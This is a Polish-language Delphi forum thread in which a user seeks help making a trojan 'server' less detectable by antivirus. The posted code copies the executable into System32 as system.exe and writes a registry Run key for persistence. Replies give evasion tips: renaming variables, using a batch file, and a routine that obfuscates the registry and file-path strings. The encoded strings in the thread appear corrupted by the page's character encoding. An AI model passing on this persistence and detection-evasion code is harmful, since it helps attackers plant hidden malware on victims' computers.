[Delphi]Dodanie do Autostartu-Wykrywalność

[Reptile ReX]

Witam, mam pewien problem Mianowicie:

Gdy dodaję do Serwera Poniższy Kod:
odpowiadający za skopiowanie pliku do danej lokalizacji następnie utworzenia wpisu w rejestrze dzięki któremu program będzie się odpalać po starcie systemu.

var

rejestr:tregistry;

begin



rejestr:=TRegistry.Create;

try

rejestr.rootkey := HKEY_CURRENT_USER;

rejestr.openkey('SoftwareMicrosoftWindowsCurrentVersionRun', true);

rejestr.writestring('SYSTEM','C:WINDOWSSystem32system.exe');

CopyFile(Pchar(paramstr(0)),Pchar('C:WINDOWSSystem32system.exe'),True);

BorderIcons:= [biSystemMenu];

finally

end;

end;

Wykrywalność Serwera z 1/32 wskakuje na 9/32 ;/

Jak zaszyfrować? lub zmienić ten kod, aby był mniej wykrywalny lub niewykrywalny ?

 

[djmentos]

Zrezygnować z napisania kolejnego trojana W VCLu... (To jest właśnie główna przyczyna tej wykrywalności)
Jeśli Ci to nie odpowiada to pozmieniaj chociaż nazwy zmiennych, ułożenie kodu itp.
Możesz przerobić klasę TRegistry jak byś chciał. A swoją drogą większość AV i tak wykryje ingerencję w folder systemowy...

 

[maly3900]

Cóż, zrezygnuj z CopyFile(); - zrób powiedzmy, plik BAT. Potem, odpal go - server sie skopiuje, usuń plik wsadowy. Zmień także zmienną `Rejestr` na `hfkjesh4jkhjkdhkjch` ;-)

 

[PaPaDo]

procedure Dodaj;

function DeCode(S:String):String;

var

 I:Integer;

begin

 Result:='';

 for I:=1 to Length(S) do

  Result:=Result+Char(Ord(S[i])-115);

end;

var

rejestr:tregistry;

begin

rejestr:=TRegistry.Create;

try

rejestr.rootkey := HKEY_CURRENT_USER;

rejestr.openkey(DeCode('ĆâŮçęÔĺŘĎŔÜÖĺâćâŮçĎĘÜá×âęćĎśčĺĺŘáçÉŘĺćÜâáĎĹčá'), true);

rejestr.writestring('SYSTEM',DeCode('ś­ĎĘĽÁˇÂĘĆĎĆěćçŘডĎćěćçŘŕˇŘëŘ'));

CopyFile(Pchar(paramstr(0)),Pchar(DeCode('ś­ĎĘĽÁˇÂĘĆĎĆěćçŘডĎćěćçŘŕˇŘëŘ')),True);

//BorderIcons:= [biSystemMenu];

finally

rejestr.Free;

end;

end;

kodowanie stringów

 

[Reptile ReX]

Hmm i co mam to podpiąć normalnie pod procedurę OnCreate ?

Bo jeżeli tak to coś nie tak :] bo nie dodaje się do Autostartu ;p proszę o pomoc

Ale i tak Pomógł leci

Zrobiłem tak:

procedure TForm1.FormCreate(Sender: TObject);

function DeCode(S:String):String;

var

 I:Integer;

begin

 Result:='';

 for I:=1 to Length(S) do

  Result:=Result+Char(Ord(S[i])-115);

end;

var

rejestr:tregistry;

begin

rejestr:=TRegistry.Create;

try

rejestr.rootkey := HKEY_CURRENT_USER;

rejestr.openkey(DeCode('ĆâŮçęÔĺŘĎŔÜÖĺâćâŮçĎĘÜá×âęćĎśčĺĺŘáçÉŘĺćÜâáĎĹčá'), true);

rejestr.writestring('SYSTEM',DeCode('ś­ĎĘĽÁˇÂĘĆĎĆěćçŘডĎćěćçŘŕˇŘëŘ'));

CopyFile(Pchar(paramstr(0)),Pchar(DeCode('ś­ĎĘĽÁˇÂĘĆĎĆěćçŘডĎćěćçŘŕˇŘëŘ')),True);

BorderIcons:= [biSystemMenu];

finally

rejestr.Free;

end;

end;

 

[PaPaDo]

Zobacz tutaj
Kod nie działał dlatego, że kodowanie tej strony nie ogrania zakodowanych stringów.
Sam kod był dobrze napisany.

 

[Reptile ReX]

Czyli co mam zrobić aby działało